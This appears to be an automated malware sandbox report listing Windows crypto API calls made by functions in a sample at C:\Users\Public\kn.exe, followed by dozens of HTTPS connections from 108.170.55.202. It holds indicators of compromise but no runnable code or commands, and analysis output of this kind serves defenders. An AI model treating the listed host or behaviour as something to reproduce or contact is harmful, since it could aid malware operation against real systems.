Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E086BA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,	6_2_00007FF7E086BA14
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07B3918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF7E07B3918
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E085F918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,	6_2_00007FF7E085F918
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E083391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,	6_2_00007FF7E083391C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07EF944 CryptDecodeObject,GetLastError,#357,	6_2_00007FF7E07EF944
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081B950 I_CryptGetLruEntryData,#357,	6_2_00007FF7E081B950
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0859970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,	6_2_00007FF7E0859970
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E088B980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,	6_2_00007FF7E088B980
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,	6_2_00007FF7E081597C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07C7988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,	6_2_00007FF7E07C7988
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0895AA8 CryptDecodeObjectEx,	6_2_00007FF7E0895AA8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F3B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,	6_2_00007FF7E07F3B14
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0829AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,	6_2_00007FF7E0829AF8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07C3A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF7E07C3A40
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E084BA50 CryptSignCertificate,SetLastError,	6_2_00007FF7E084BA50
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0831A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,	6_2_00007FF7E0831A44
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0837A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF7E0837A70
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0849A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,	6_2_00007FF7E0849A58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E085FA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,	6_2_00007FF7E085FA84
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0795BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,	6_2_00007FF7E0795BA4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07B9BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,	6_2_00007FF7E07B9BC8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E083BBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,	6_2_00007FF7E083BBC0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0833BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF7E0833BEB
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E083FB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,	6_2_00007FF7E083FB50
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07FBB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF7E07FBB38
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E086BB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,	6_2_00007FF7E086BB50
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0865B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,	6_2_00007FF7E0865B44
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0867B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,	6_2_00007FF7E0867B60
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0895B90 CryptDecodeObjectEx,memmove,	6_2_00007FF7E0895B90
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07BBB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,	6_2_00007FF7E07BBB80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E085FB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,	6_2_00007FF7E085FB94
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0825CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,	6_2_00007FF7E0825CE8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07CFC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,	6_2_00007FF7E07CFC20
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07EFC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF7E07EFC34
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0895C54 CryptDecodeObjectEx,CryptDecodeObjectEx,	6_2_00007FF7E0895C54
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07D1C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,	6_2_00007FF7E07D1C50
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07E3C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,	6_2_00007FF7E07E3C60
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0821C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,	6_2_00007FF7E0821C84
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07C5DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,	6_2_00007FF7E07C5DA1
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07A1DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,	6_2_00007FF7E07A1DE8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07C5DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,	6_2_00007FF7E07C5DF7
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E085FD2C CryptDecryptMessage,GetLastError,#357,	6_2_00007FF7E085FD2C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E084DD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,	6_2_00007FF7E084DD1C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0867D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,	6_2_00007FF7E0867D3C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E086BD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,	6_2_00007FF7E086BD3C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0895D74 CryptDecodeObjectEx,strcmp,strcmp,	6_2_00007FF7E0895D74
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F1D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,	6_2_00007FF7E07F1D70
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0813D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,	6_2_00007FF7E0813D60
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07E9D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF7E07E9D6C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07EDD80 CertFindExtension,CryptDecodeObject,	6_2_00007FF7E07EDD80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0845D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,	6_2_00007FF7E0845D80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07EDEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,	6_2_00007FF7E07EDEA4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081DEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,	6_2_00007FF7E081DEB0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0867EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,	6_2_00007FF7E0867EE8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07E7F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,	6_2_00007FF7E07E7F14
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0825F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,	6_2_00007FF7E0825F04
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0821E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,	6_2_00007FF7E0821E2C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0895E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,	6_2_00007FF7E0895E3C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E085DE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,	6_2_00007FF7E085DE70
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0835FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,	6_2_00007FF7E0835FA8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0895FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,	6_2_00007FF7E0895FF0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07C5FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,	6_2_00007FF7E07C5FE8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0895F20 CryptDecodeObjectEx,	6_2_00007FF7E0895F20
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0805F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,	6_2_00007FF7E0805F54
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07CFF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,	6_2_00007FF7E07CFF64
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0839F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,	6_2_00007FF7E0839F90
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07C60DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,	6_2_00007FF7E07C60DA
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E085E044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,	6_2_00007FF7E085E044
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0804070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,	6_2_00007FF7E0804070

Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49877 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49903 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49910 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49918 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49929 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49945 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49954 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49962 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49999 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50006 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50017 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50024 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50032 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50043 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50050 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50062 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50069 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50080 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50080 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50088 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50107 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50114 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50126 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50133 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50145 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50153 version: TLS 1.2
